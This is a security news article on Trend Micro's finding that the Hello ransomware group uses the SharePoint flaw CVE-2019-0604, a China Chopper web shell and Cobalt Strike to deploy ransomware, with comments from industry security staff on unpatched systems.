Microsoft released the advisory on the SharePoint vulnerability (CVE-2019-0604) and patched the gap back in 2019. (Photo by Jeenah Moon/Getty Images)

Researchers on Tuesday found that the Hello ransomware group (aka WickrMe) has been using a Microsoft SharePoint vulnerability and a China Chopper web shell to launch ransomware attacks.

In a blog posted by Trend Micro, the researchers reported that to ignite a ransomware payload, the attackers abuse a Cobalt Strike beacon. The researchers believe the China Chopper web shell was used in a likely attempt to circumvent detection with known samples.  

Microsoft released the advisory on the SharePoint vulnerability (CVE-2019-0604) and patched the gap back in 2019. Since its first abuse and prominent attack in 2020, the notable abuse of the vulnerability has continued to make the news.  

The researchers said use of both the exploit and China Chopper web shells together has been observed for varying attack routines and brings up the question of whether the combination of the two tools indicate a certain level of access among the cybercriminals using them, or if there are more parties involved and capable of buying access from several people?

“It’s also worth noting that two years later, the continued abuse of the vulnerability strongly implies that a huge number of companies still have not patched the gap,” the researchers said.

Chris Morales, chief information security officer at Netenrich, found it amazing that for all the machine learning behavior technology and attack frameworks the security industry likes to talk about, attackers can still win by using a simple little command line web shell that has been around almost a decade.

“China Chopper was used in the Equifax breach years after it was a known technique,” Morales said. “I am sure vendors will pop up claiming to be able to stop the use of China Chopper. That might be true, yet here we are with variants still in use.”

While it’s a new attack vector, the delivery mechanism the attackers employed isn’t, said Charles Everette, director of customer success at Deep Instinct.

Everette said the technique leverages arbitrary code execution (ACE), a form of remote code injection, which then commonly falls to more “normal” and archaic means of using scripts. “In our experience, we have seen that the web shell is a glorified way to execute a script (commonly PowerShell) which reaches out in an attempt to pull down the other malicious code like CobaltStrike beacon,” Everette said.